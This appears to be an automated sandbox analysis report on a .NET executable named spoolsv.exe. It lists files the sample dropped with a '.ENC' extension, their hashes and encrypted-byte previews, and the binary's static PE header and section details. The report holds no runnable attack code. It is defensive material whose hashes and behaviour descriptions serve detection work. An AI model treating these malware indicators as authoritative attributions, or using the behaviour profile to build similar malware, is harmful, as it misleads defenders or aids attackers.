                                                                                                                                                                                                                                                      Preview:5....aj.o..q..u..z.*....IB...D..g.K3*.4-2%V..N......R.L...(....Ax3..6.....q.n.O.O...$...T.......$.`:c.....I2.q.@.....m..@Z....t[2Y.7......9.c:}y.....v.3lz..?...v..9l.(G..Yu.<.1.,......3.A.||.L.3.r....G.7..&p..].".....i..pt.|:..=6s....-.?...s.~.K.j`.&.....U..{.....@..~Ck.*...>?....G.&@.t....../..B..;.. ..3.._O..k.......$S..='....'..l..5.....Y..;.ME..,..S....C........n~.....@..,.........aw*\.l....!%V%2...$.z..I..rr..w.`I M)..........}O....,.d...N....dsr..U.I.C'...rd+T....$$W..R.-..G.K.^(.......P....\.IJ..f9.gi.@5.!.d.P.=VYOj..RI.m.|Ko}...SK.^.f....g..Og c..$.n..L..._.:y...h..l...8.....i{.q.Z).q...W{Q'...r..........w2.-yY..r...4W.='E..G.....y.M...:. ...n..z.\...!y........Q....7..r.c!p.\n......Y.N.K1. ..L..u.6.`m...../i[..v..6..6S....iJ.Y.Q[....?.?h.].#(3..d.m'g.C...3......%R#;..3.h....&.e.U=..%s8.pA...)c..X..'.7.o.l#.)6.a.[..i.x...1.g.UP.pc....d.|.....;n<.... .Tz.".g{..Y..-.t..7%....4.......l.b...<.7.?...=.d?bg...8o.1.YxI..2..{..oN...A.(p..F....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir5952_991612011\CRX_INSTALL\sw_modules\settings.js.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1568
                                                                                                                                                                                                                                                      Entropy (8bit):7.88338266276903
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:ZP/D4rQkk8dWABEIooPzqVU2v+MUsLSpy/UIETbl:ZP0UmdWhIooPShqzBTbl
                                                                                                                                                                                                                                                      MD5:3B18E360B2949EA65D63CE3C87B8E495
                                                                                                                                                                                                                                                      SHA1:BBE9B46AD1218EC2904D10A95B4BDA61AA6EB28B
                                                                                                                                                                                                                                                      SHA-256:33BFA7849F48F764A9CA2BB72D98E943050F04C0AF6846A0007A14ABCA7BC4C4
                                                                                                                                                                                                                                                      SHA-512:D03FBA0700B12C02AF035C2EDD250E38D588B1CEB357127ABBE2CD67372FFA52E6DAF5BAB6CA447A9F56CAA8A7E8DC467F4966C6D7830DB8206D1718B21C7E81
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:5....aj.o..q..u..z.*....IB...D..g.K3*.4-2%V..N......R.L...(....Ax3..6.....q.n.O.O...$...T.......$.`:c.....I2.q.@.....m..@Z....t[2Y.7......9.c:}y.....v.3lz..?...v..9l.(G..Yu.<.1.,......3.A.||.L.3.r....G.7..&p..].".....i..pt.|:..=6s....-.?...s.~.K.j`.&.....U..{.....@..~Ck.*...>?....G.&@.t....../..B..;.. ..3.._O..k.......$S..='....'..l..5.....Y..;.ME..,..S....C........n~.....@..,.........aw*\.l....!%V%2...$.z..I..rr..w.`I M)..........}O....,.d...N....dsr..U.I.C'...rd+T....$$W..R.-..G.K.^(.......P....\.IJ..f9.gi.@5.!.d.P.=VYOj..RI.m.|Ko}...SK.^.f....g..Og c..$.n..L..._.:y...h..l...8.....i{.q.Z).q...W{Q'...r..........w2.-yY..r...4W.='E..G.....y.M...:. ...n..z.\...!y........Q....7..r.c!p.\n......Y.N.K1. ..L..u.6.`m...../i[..v..6..6S....iJ.Y.Q[....?.?h.].#(3..d.m'X.!|.2'....:..=...F..U......Kmv..G.......'....B.y`#....'..).........._....u~...\p..8......V..|T...s.h..1.fs./..m.[..N..A(.p.b0.~.........-.:.$...+;O].)`u/f...P.._.z..w../f..z......].&W.f#

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir5952_991612011\CRX_INSTALL\sw_modules\util.js.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):4272
                                                                                                                                                                                                                                                      Entropy (8bit):7.9588366797649455
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:ZP0UmdWhIooPhhMa34UHOIR7+kQcBV8sOLTZ1U5v6PV3OhrvsK2e48dxl:R0LdWhIdEwOIR7+kQcT8jTZ42VO1/MWb
                                                                                                                                                                                                                                                      MD5:BE66089E786FB141B5028E2DF2919A98
                                                                                                                                                                                                                                                      SHA1:CC3023C36A46D30DA103E78E08F685403D38B67D
                                                                                                                                                                                                                                                      SHA-256:13029815BE85FED3531A1A7E267307586704F3321967970727AD08402AAEE7CD
                                                                                                                                                                                                                                                      SHA-512:2560BBDD0437013AF7331DF8B708D5C20AE07B1FEB233E9AD2E4DF50B4234E33C9DC6F327E708CD23C097ABD8B17A9E84C709F410D2360B461F3262DD995501D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:5....aj.o..q..u..z.*....IB...D..g.K3*.4-2%V..N......R.L...(....Ax3..6.....q.n.O.O...$...T.......$.`:c.....I2.q.@.....m..@Z....t[2Y.7......9.c:}y.....v.3lz..?...v..9l.(G..Yu.<.1.,......3.A.||.L.3.r....G.7..&p..].".....i..pt.|:..=6s....-.?...s.~.K.j`.&.....U..{.....@..~Ck.*...>?....G.&@.t....../..B..;.. ..3.._O..k.......$S..='....'..l..5.....Y..;.ME..,..S....C........n~.....@..,.........aw*\.l....!%V%2...$.z..I..rr..w.`I M)..........}O....,.d...N....dsr..U.I.C'...rd+T....$$W..R.-..G.K.^(.......P....\.IJ..f9.gi.@5.!.d.P.=VYOj..RI.m.|Ko}...SK.^.f....g..Og c..$.n..L..._.:y...h..l...8.....i{.q.Z).q...W{Q'...r..........w2.-yY..r...4W.='E..G.....y.M...:. ...n..z.\...!y........Q....7..r.c!p.\n......Y.N.K1. ..L..u.6.`m...../i[..v..6..6S....iJ.Y.Q[....?.?h.].#(3..d.m'g.C...3......%R>.a!.B.vi%K.VSE.%3.)..4.I....t...ol.F.'...^..o*....""yh.............D[.sY......5%...5......d.R...1..A>..|(Y..s1).... r..~.[|.Q..X..Yw...o.....A.[....C......Y...(.s.']o.?p..T#

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir5952_991612011\CRX_INSTALL\sw_modules\viewer-module.js.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):7696
                                                                                                                                                                                                                                                      Entropy (8bit):7.976411807921158
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:R0LdWhIdDp1PGzKQpzxT7qK2ae3pM3PPaR7y+bcW+ivNcjj5WgiS:R4WWdDvG7dJ2aIMnaRGMcWTupWS
                                                                                                                                                                                                                                                      MD5:66E4CACDFFF9D6E640B4848EE84F5CC1
                                                                                                                                                                                                                                                      SHA1:5A0E7619984B13F60E55091B590F80413E66BA76
                                                                                                                                                                                                                                                      SHA-256:613645F5EA46C716BA0081B930FE67A8CC73B4BBF18C1694C496D19C165435CC
                                                                                                                                                                                                                                                      SHA-512:B25CA94B648D92C359C32FBC07043AB66BB636EE37212398FEDE07F7B7197470D7BC4441819A36108F0800C2C770965D69AE3292F3C630C37225D6DAF39421C9
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:5....aj.o..q..u..z.*....IB...D..g.K3*.4-2%V..N......R.L...(....Ax3..6.....q.n.O.O...$...T.......$.`:c.....I2.q.@.....m..@Z....t[2Y.7......9.c:}y.....v.3lz..?...v..9l.(G..Yu.<.1.,......3.A.||.L.3.r....G.7..&p..].".....i..pt.|:..=6s....-.?...s.~.K.j`.&.....U..{.....@..~Ck.*...>?....G.&@.t....../..B..;.. ..3.._O..k.......$S..='....'..l..5.....Y..;.ME..,..S....C........n~.....@..,.........aw*\.l....!%V%2...$.z..I..rr..w.`I M)..........}O....,.d...N....dsr..U.I.C'...rd+T....$$W..R.-..G.K.^(.......P....\.IJ..f9.gi.@5.!.d.P.=VYOj..RI.m.|Ko}...SK.^.f....g..Og c..$.n..L..._.:y...h..l...8.....i{.q.Z).q...W{Q'...r..........w2.-yY..r...4W.='E..G.....y.M...:. ...n..z.\...!y........Q....7..r.c!p.\n......Y.N.K1. ..L..u.6.`m...../i[..v..6..6S....iJ.Y.Q[....?.?h.].#(3..d.m'g.C...3......%RL....b..R.G...n.h....2....w....r...M..<.6..)!..o2..a*3..eQ.A.....L..S*y....DU.,A....s.l...j. ....7UW..NM....'....M............F....n......_........%t.b.~.....y..L...HpCZ...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\wct7120.tmp.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):74208
                                                                                                                                                                                                                                                      Entropy (8bit):7.997590389532169
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:1536:ijl2MsaM5mME2d8H/nvn8CMS7mSvZjBjRuTu+XUF+2cQYT03M:ij6mMd8Hn2SvZ1jRuaY2cQYT03M
                                                                                                                                                                                                                                                      MD5:6792CDE0046BF2593D2DDD23AD65C947
                                                                                                                                                                                                                                                      SHA1:7C74E89E9A0E2EC63D87AD67A140B19A6EFAE820
                                                                                                                                                                                                                                                      SHA-256:D721C61154BB9E144B8113A3207B457BC81C32800F4D6B3B6F1E161BD030FC22
                                                                                                                                                                                                                                                      SHA-512:8F8993F03859D81CFBC486F78FE316CCCB56C9BDD38CAF07E61D450EF69782C8202685E4BB0352DCACACFD4DFC01E540F2AE138F74C2287D168AFA7CFF6BFFE7
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:=.a.K..m&g`....u..q....P..`..A.t..3...d..%.W.....O..=&...t.A..<.Q......r...4f.4.<J..e`...`....v...Q....th..2^..R..L..7.91..k...R..^.T...[.o....\....K...&..4...Tjrma.0..=....../M....0h.w..<.%4a....ID..u..U...L.....R.7...&...[W{..x._A.%.....Ds..a.6..94l./F...N.!o..83O.4...Hw..L o.,...I..8W.Cd.,...>,.I...j.Ze@.........s^.E.....NJ.t..\.E....5.."..lj.#.......P.. ......?.......+e..#..............<...g`#......Y...H+@....H`.H......HS..i.(.v.A..].c.op..FI....'v...'5.Fd7.%K.N..@%L.}.........e..9[.......c.K..^.N\V..u...U..k....H...*4..l...#d...x(.....T.i...v.&........d.~........@.I(.......y.a....v.f./.d......;Q......V.)Z.*.`.==K.X.k..p.39........r..Ox.N.;.......d&."Xnj$Yl../....K..S..&.).3..lic...+....A......!>v..l}.).{..'e.../.,a(.......+...m..........Q3..7O.o$.l}d...+..\W...'..U.m.z...|06..=.T...8;.b....2....E.E./^..'f.e..."..M........;N..e.\..H.\.y2.....*.1(.....?....R{}...'.{...`2&u.B...7..OUm.....Z..lB{$\.....D0(.go.q..... ....+........k

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\wctB366.tmp.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):64864
                                                                                                                                                                                                                                                      Entropy (8bit):7.9972034659638425
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:1536:ijl2MsURiDPP07dz04KgiETxLZsJsQ5YV+Vj1KWmVEz:ijFg87d/Kg1naYoVj8WaEz
                                                                                                                                                                                                                                                      MD5:A151AE1FB2094AFDB3C0A437771824CC
                                                                                                                                                                                                                                                      SHA1:4102AEC5AB1C653570C8C6FE4DA44B2415AA23EE
                                                                                                                                                                                                                                                      SHA-256:0077149AAE420D4A6B3615D660A7D6347DAD7C0EA972D01DA9E63486FAA2ED69
                                                                                                                                                                                                                                                      SHA-512:DB1F09260264DE3A1A44BBF285DB5E32050864C5B665DDE3CCAC245A51EFAD6AD75EE792813E78718FEF291E88EFE505E26DF0C58DDAACDEADD2F8A7EC14A836
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:=.a.K..m&g`....u..q....P..`..A.t..3...d..%.W.....O..=&...t.A..<.Q......r...4f.4.<J..e`...`....v...Q....th..2^..R..L..7.91..k...R..^.T...[.o....\....K...&..4...Tjrma.0..=....../M....0h.w..<.%4a....ID..u..U...L.....R.7...&...[W{..x._A.%.....Ds..a.6..94l./F...N.!o..83O.4...Hw..L o.,...I..8W.Cd.,...>,.I...j.Ze@.........s^.E.....NJ.t..\.E....5.."..lj.#.......P.. ......?.......+e..#..............<...g`#......Y...H+@....H`.H......HS..i.(.v.A..].c.op..FI....'v...'5.Fd7.%K.N..@%L.}.........e..9[.......c.K..^.N\V..u...U..k....H...*4..l...#d...x(.....T.i...v.&........d.~........@.I(.......y.a....v.f./.d......;Q......V.)Z.*.`.==K.X.k..p.39........r..Ox.N.;.......d&."Xnj$Yl../....K..S..&.).3..lic...+....A......!>v..l}.).{..'e.../.,a(.......+...m..........Q3..7O.o$.l}d...+..\W...'..U.m.z...|06..=.T...8;.b....2....E.E./^..'f.e..."..M........;N..e.\..H.\.y2.....*.1(.....?....R{}...'.{...`2&u.B...7..OUm.....Z..lB{$\.....D0(.go.q..... ....+........k

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\wctDE6E.tmp.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):42164608
                                                                                                                                                                                                                                                      Entropy (8bit):7.999995580436242
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:786432:ITirQTvWKZML2rkr1BfEGVTyVzwnzk038yg7H+XFdMhc96h/pTs+WrdMnBu6:IWFKZMLukrsIG92Ir/7H+cc9YxKMns6
                                                                                                                                                                                                                                                      MD5:FA0E7FA4DD8235BFDC47811C6AC42C73
                                                                                                                                                                                                                                                      SHA1:B71BB4785D38A0051069C6AFEB4C846BC137AE97
                                                                                                                                                                                                                                                      SHA-256:2049251256697BF14CF2ED64AECBB61281B42E3B2326F6D424AF2E235239B533
                                                                                                                                                                                                                                                      SHA-512:37E4A0503B5BCC1BA3370007E0D17ED29EF743BF90DE049F6B87DC6DC181553EBC1695E114D5F1C7290B7DFAB90E62A8E6971EA73D380F2F87B2196CB2615AA1
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:R[/D..J.b.s=.k3.p.X....}I}...|..m.7U...[.I.1<".t>(s.8...*e 3.(..;.....?|nFI&O.U....{.......q..p..P..@T..J.I..4WU+.*+.@..?6....2w....a..La .c..,.....k['.,A!.XI.:....m...;7..b..u.6<.:y..}.Q@D6..y:./...(.{e..~...^....y.....D..4......j.qy......*..........w.q.vI..H..o....>.G.N|.$..xiOI.s..H$@.d#..t..%2.Q.5..*..,)....W{e......../.....X..a...n...z..M.#g.s...f...|&....>.K..*2~=....`."..~...R..w.\E...X.T.pq..g.h............{.qtB.[.V....D..m.!r.=....J...:...V.%...6..r...8.L.{0..3.$.C=.}....QZS.Cy...P.iV..I...}.....W.D.e..C %.<..$......G..au[-.....Va.y.z)aN."+.o..k.lLU...m.s$....W.|........ ...?7&.....t.a.FR..;......Y...._Q!....m6........9NO.V....ZJR..@h... .Z.bCw>.gb~.[..g..Cp}]...42a.Q..7.x.}...J.........\...;.WF.w.1..H.KP..,G.c...<....N..Y.7.N{..#...58.....r.,....ey&}Np.7.....k/...P..m..............`.rb...x..V5~/~L..C..GqV.lC.5...a\..I.....,..;.Tl0.o...T...L......9Q0...a.........].Fi.^........'W.z.X.c[b.f.;r.e.....E......|_.....k.t......1..DG.H..<

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\wmsetup.log.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):704
                                                                                                                                                                                                                                                      Entropy (8bit):7.722203247994016
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:MAiVqvGXizpxSQuhyFChh4PMV+qsHXRC2qBb4SjxLIURy2eFYnh5lM+nHOgW5P3l:MAiV0GXOpagZIsHXRCbbxLI72eFv+HOt
                                                                                                                                                                                                                                                      MD5:FD74968FAEB9D762B40915C6056A635A
                                                                                                                                                                                                                                                      SHA1:B12EDFE9BFC5127E64D502D4A1E646E5E590C312
                                                                                                                                                                                                                                                      SHA-256:7723F8979BD5F655E185950758AB466A56C28F2BCBB5C4899A3031A695C45FFF
                                                                                                                                                                                                                                                      SHA-512:0685725F48EE6BE7C5414D29DD3CF3150C94A5E502DDACAF179CAA2391BA208368E5E3646D7114A146FBE29B948EA4C17D5EC8C900B98714068373BD6F4079F6
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:"..(.tJ.[.....h.9.....q..T.N.f...h{(B.+Z..s#h.....z.S+w.G...0...o*];...F..t..O.....]7A.d._...g.0....* J.l.Ad.B......f.EF._....*."...l-E..=..;'\D....*5...*.Q.a../........o.>.j."....'[..V....g..C....1[.....k..$h..A...Q.Z.Q.4.%z[Ec..=..N..e..........x.B5e.,]..~.d....U..f..!..k.L..p.~.+..N.....U.9..{,z....H`.b$..K.|gV...l.Xjv1.Nv...>..n..v..=.3.X.D....g.."..}l."..(.Z........2T....m.Q.S....i.P *..d.w7..kB.(....~..$.U .^..i.|..+.P.......ao.a..........]){..%.u.(.g.y]1..3.AQ.m.).|8.......8;H....g)....n\.`....t.p9..>YW{J.^X.7.A0?.?g.:.1.I.a..#_.........+....q;/..eN.pm..D.......yk....pxI...D.@...h....?...kNA6E......_Cm?.+.h.k...'.+p..J.M*W..V.....^'...1.<L.8A.Z..^.m..$..

                                                                                                                                                                                                                                                      Static File Info

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Entropy (8bit):6.390959830171561
                                                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                                                                                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                                                                                                      • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                                                                      File name:spoolsv.exe
                                                                                                                                                                                                                                                      File size:138'752 bytes
                                                                                                                                                                                                                                                      MD5:fcfae4fdcc273f8a46c51d49fa8a4a03
                                                                                                                                                                                                                                                      SHA1:3a0e314b7bbdf5467df8b92a348c1b464fd502b0
                                                                                                                                                                                                                                                      SHA256:49ff687dbb13ed84815f3f57c660a0a4fc5cb21c82b605ce53338538a864586d
                                                                                                                                                                                                                                                      SHA512:50e6960d98dbc8d63975b0514deb6e9f7266a054e129902ac2ecf7c8500c84e5125d4896c9ec54a4187971832abfe2c575fd4c166baea39712b35f2f35e000f7
                                                                                                                                                                                                                                                      SSDEEP:3072:pG+KeZW7bSWaWDbkDOrZBRHQbPRyZ2pPYU:pU17buWDbkiBR8AZ2
                                                                                                                                                                                                                                                      TLSH:33D3BE18B3D64118E0BF5FB15CF676669A74FE635A02C61F20C5378F2E33A858C416EA
                                                                                                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...K.6g.................8...........W... ...`....@.. ....................................@................................

                                                                                                                                                                                                                                                      File Icon

                                                                                                                                                                                                                                                      Icon Hash:b0d84c0f4b4f2713

                                                                                                                                                                                                                                                      Static PE Info

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Entrypoint:0x4157ce
                                                                                                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                      Time Stamp:0x67368E4B [Thu Nov 14 23:56:59 2024 UTC]
                                                                                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                                                                      OS Version Major:4
                                                                                                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                                                                                                      File Version Major:4
                                                                                                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                                                                                                      Subsystem Version Major:4
                                                                                                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                                                                                                      Entrypoint Preview

                                                                                                                                                                                                                                                      Instruction
                                                                                                                                                                                                                                                      jmp dword ptr [00402000h]
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al

                                                                                                                                                                                                                                                      Data Directories

                                                                                                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x157800x4b.text
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000xe10a.rsrc
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x260000xc.reloc
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                      Sections

                                                                                                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                      .text0x20000x137d40x138009ae3d5e6d7e93440b45838f2e85a0a09False0.5887545072115384data6.053190660390521IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
